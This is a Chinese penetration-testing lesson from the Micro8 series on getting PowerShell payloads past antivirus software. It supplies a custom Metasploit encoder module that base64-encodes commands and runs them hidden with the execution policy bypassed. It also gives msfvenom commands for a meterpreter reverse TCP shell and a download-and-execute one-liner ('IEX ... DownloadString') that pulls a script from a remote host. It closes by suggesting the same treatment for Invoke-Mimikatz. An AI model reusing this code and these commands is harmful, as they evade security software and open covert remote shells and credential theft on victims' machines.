# 第四十九课：关于Powershell对抗安全软件

**知识点介绍：**

Windows PowerShell是以.NET Framework技术为基础，并且与现有的WSH保持向后兼容，因此它的脚本程序不仅能访问.NET CLR，也能使用现有的COM技术。同时也包含了数种系统管理工具、简易且一致的语法，提升管理者处理，常见如登录数据库、WMI。Exchange Server 2007以及System Center Operations Manager 2007等服务器软件都将内置Windows PowerShell。Windows PowerShell的强大，并且内置，在渗透过程中，也让渗透变得更加有趣。而安全软件的对抗查杀也逐渐开始针对powershell的一切行为。在 [https://technet.microsoft.com，看到文档如下：](https://micro8.gitbook.io/micro8/contents-1/41-50/https:/technet.microsoft.com，看到文档如下：)

> Here is a listing of the available startup parameters: -Command Specifies the command text to execute as though it were typed at the PowerShell command prompt. -EncodedCommand Specifies the base64-encoded command text to execute. -ExecutionPolicy Sets the default execution policy for the console session. -File Sets the name of a script file to execute. -InputFormat Sets the format for data sent to PowerShell as either text string or serialized XML. The default format is XML. Valid values are text and XML. -NoExit Does not exit after running startup commands. This parameter is useful when you run PowerShell commands or scripts via the command prompt(cmd.exe). -NoLogo Starts the PowerShell console without displaying the copyright banner. -Noninteractive Starts the PowerShell console in non-interactive mode. In this mode, PowerShell does not present an interactive prompt to the user. -NoProfile Tells the PowerShell console not to load the current user’s profile. -OutputFormat Sets the format for output as either text string or serialized XML. The default format is text. Valid values are text and XML. -PSConsoleFile Loads the specified Windows PowerShell console file. Console files end with the .psc1 extension and can be used to ensure that specific snap-in extensions are loaded and available. You can create a console file using Export-Console in Windows PowerShell. -Sta Starts PowerShell in single-threaded mode. -Version Sets the version of Windows PowerShell to use for compatibility,such as 1.0. -WindowStyle Sets the window style as Normal, Minimized, Maximized, or Hidden. The default is Normal.

针对它的特性，本地测试：

> Add-Type -AssemblyName PresentationFramework;
>
> \[System.Windows.MessageBox]::Show('Micropoor')

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwptrNyjoCSUQTVFi%2Ffaf8154c646ab4aa837ebb8d5d99ae78.jpg?generation=1551060446256348\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwptv9uhkhkHOR5sp%2Fe1f2fb4edc10e83ae5f2c2f51d6ead38.jpg?generation=1551060451019994\&alt=media)

上文所说，越来越多的杀软开始对抗，powershell的部分行为，或者特征。以msfvenom为例，生成payload。\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwptxpD44lqfuH-xd%2F7eec22528d589cc79d6af609182206e7.jpg?generation=1551060440835857\&alt=media)

micropoor.ps1不幸被杀。\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwpu1BsjKlfFyoBod%2F90aeb138701d59ba01c5497d2c9d978e.jpg?generation=1551060449611573\&alt=media)

针对powershell特性，更改payload\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwpu6sV2IMM5qNT71%2F12ee496efb54f3670b111d3be3cde056.jpg?generation=1551060425176451\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwpu9CWMbNDv43_QK%2F55da22835d354321eba9b36ebf36128d.jpg?generation=1551060450571460\&alt=media)

接下来考虑的事情是如何把以上重复的工作变成自动化，并且针对powershell，DownloadString特性，设计出2种payload形式：\
（1）目标机出网\
（2）目标机不出网

并且根据需求，无缝连接Metasploit。

根据微软文档，可以找到可能对以上有帮助的属性，分别为：

* Window &#x20;
* Style &#x20;
* NoExit EncodedCommand &#x20;
* exec

自动化实现如下：

```ruby
# copy base64.rb to metasploit-framework/embedded/framework/modules/encoders/powershell.If powershell is empty,mkdir powershell.
# E.g
# msf encoder(powershell/base64) > use exploit/multi/handler
# msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
# payload => windows/x64/meterpreter/reverse_tcp
# msf exploit(multi/handler) > exploit
# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows.
# [*] Started reverse TCP handler on xx.1xx.xx.xx:xx

class MetasploitModule < Msf::Encoder
    Rank = NormalRanking

def initialize
    super(
    'Name' => 'Powershell Base64 Encoder',
    'Description' => %q{
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx
-f psh-reflection --arch x64 --platform windows | msfvenom -e
powershell/base64 --arch x64 --platform windows.
    },
    'Author' => 'Micropoor',
    'Arch' => ARCH_CMD,
    'Platform' => 'win')

register_options([
OptBool.new('payload', [ false, 'Use payload ', false ]), 
OptBool.new('x64',[ false, 'Use syswow64 powershell', false ])
])

end

def encode_block(state, buf)
base64 = Rex::Text.encode_base64(Rex::Text.to_unicode(buf)) 
cmd = ''
if datastore['x64']
    cmd += 'c:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe '
else
    cmd += 'powershell.exe ' 
end
if datastore['payload']
    cmd += '-windowstyle hidden -exec bypass -NoExit ' 
end
cmd += "-EncodedCommand \#{base64}" 
end
end

# if use caidao
# execute echo powershell -windowstyle hidden -exec bypass -c \""IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.117/xxx.ps1');\""|msfvenom -e x64/xor4 --arch x64 --platform windows
# xxx.ps1 is msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows.
```

> copy powershell\_base64.rb to metasploit‐framework/embedded/framework/modules/encoders/powershell.If powershell is empty,mkdir powershell.

参数 payload 选择是否使用 Metasploit payload，来去掉 powershell 的关键字。

例1（目标出网，下载执行）：

```bash
echo powershell ‐windowstyle hidden ‐exec bypass ‐c \""IEX (New‐ObjectNet.WebClient).DownloadString('http://192.168.1.117/micropoor.ps1');\""|msfvenom ‐e powershell/base64 ‐‐arch x64 ‐‐platform windows
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwpuFlkbshWj-nAsW%2F837e8a66210018c4e7891f7cc44ae8dc.jpg?generation=1551060445699600\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwpuICFZGwNRgsYaB%2F3101ba162d3677409f14f2e6f58a5d2d.jpg?generation=1551060425004830\&alt=media)

例2（目标不出网，本地执行）\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwpuK7V25I6cKq2Og%2F274ee525bf8c174b256047a449e2165c.jpg?generation=1551060431120030\&alt=media)

## 注：加payload参数

```bash
msfvenom ‐p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.117 LPORT=8080 ‐f psh‐reflection ‐‐arch x64 ‐‐platform windows | msfvenom ‐e powershell/base64 ‐‐arch x64 ‐‐platform windows payload
```

更多有趣的实验：

把例1的 down 内容更改为例2，并且去掉 payload 参数。来减小 payload 大小。

更改 Invoke-Mimikatz.ps1 等。

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwpuRHd7wyxoNboFt%2F1668ff8230cc690822b002a58bed23b7.jpg?generation=1551060446166855\&alt=media)

> Micropoor